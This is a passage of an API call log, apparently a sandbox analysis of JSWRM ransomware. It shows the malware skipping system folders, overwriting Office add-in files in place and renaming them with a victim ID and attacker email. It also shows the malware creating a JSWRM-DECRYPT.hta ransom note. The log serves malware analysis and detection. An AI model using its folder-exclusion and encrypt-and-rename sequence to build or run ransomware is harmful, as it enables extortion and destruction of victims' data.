ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa5581c0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa68949f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x12068, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.049] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.049] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.049] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.049] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.049] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.049] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.049] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.049] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.049] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.049] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0124.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0124.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0124.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0124.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0124.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0124.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.050] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6c1f8d1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6c1f8d1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c45b55, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0124.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0124.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0124.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0124.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f848 [0124.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0124.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.050] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6aee686, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6aee686, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6aee686, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ea8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.050] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.051] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0124.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0124.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0124.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0124.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0124.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ede0 [0124.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0124.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0124.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.051] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x138defa8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x138defa8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13bd9da3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f39d, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.fi.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.051] lstrcmpiW (lpString1="PowerViewRes.fi.xap", lpString2=".") returned 1 [0124.051] lstrcmpiW (lpString1="PowerViewRes.fi.xap", lpString2="..") returned 1 [0124.051] lstrcmpiW (lpString1="PowerViewRes.fi.xap", lpString2="...") returned 1 [0124.051] lstrcmpiW (lpString1="PowerViewRes.fi.xap", lpString2="windows") returned -1 [0124.051] lstrcmpiW (lpString1="PowerViewRes.fi.xap", lpString2="recovery") returned -1 [0124.051] lstrcmpiW (lpString1="PowerViewRes.fi.xap", lpString2="perflogs") returned 1 [0124.051] lstrcmpiW (lpString1="PowerViewRes.fi.xap", lpString2="documents and settings") returned 1 [0124.051] lstrcmpiW (lpString1="PowerViewRes.fi.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.051] lstrcmpiW (lpString1="PowerViewRes.fi.xap", lpString2="system volume information") returned -1 [0124.051] lstrcmpiW (lpString1="PowerViewRes.fi.xap", lpString2="msocache") returned 1 [0124.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.fi.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0124.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.fi.xap", cchWideChar=19, lpMultiByteStr=0x2412b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.fi.xap", lpUsedDefaultChar=0x0) returned 19 [0124.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0124.051] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.fi.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0124.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.fi.xap", cchWideChar=19, lpMultiByteStr=0x241128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.fi.xap", lpUsedDefaultChar=0x0) returned 19 [0124.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0124.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0124.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0124.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0124.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\fi\\PowerViewRes.fi.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\fi\\powerviewres.fi.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.052] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=324509) returned 1 [0124.052] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0124.053] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.075] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.075] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0124.076] CloseHandle (hObject=0x338) returned 1 [0124.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0124.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0124.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0124.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0124.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0124.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0124.076] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0124.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0124.076] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.076] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\fi\\PowerViewRes.fi.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\fi\\powerviewres.fi.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\fi\\PowerViewRes.fi.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\fi\\powerviewres.fi.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0124.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0124.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0124.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0124.077] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0124.077] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x138defa8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x138defa8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13bd9da3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f39d, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.fi.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.077] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0124.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0124.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0124.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0124.078] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13440553, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13440553, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0124.079] lstrcmpiW (lpString1="fr", lpString2=".") returned 1 [0124.079] lstrcmpiW (lpString1="fr", lpString2="..") returned 1 [0124.079] lstrcmpiW (lpString1="fr", lpString2="...") returned 1 [0124.079] lstrcmpiW (lpString1="fr", lpString2="windows") returned -1 [0124.079] lstrcmpiW (lpString1="fr", lpString2="recovery") returned -1 [0124.079] lstrcmpiW (lpString1="fr", lpString2="perflogs") returned -1 [0124.079] lstrcmpiW (lpString1="fr", lpString2="documents and settings") returned 1 [0124.079] lstrcmpiW (lpString1="fr", lpString2="$RECYCLE.BIN") returned 1 [0124.079] lstrcmpiW (lpString1="fr", lpString2="system volume information") returned -1 [0124.079] lstrcmpiW (lpString1="fr", lpString2="msocache") returned -1 [0124.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0124.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0124.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0124.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0124.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0124.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0124.079] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\fr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\fr\\jswrm-decrypt.hta")) returned 0xffffffff [0124.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0124.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0124.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0124.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0124.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0124.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0124.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0124.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\fr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\fr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.089] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, 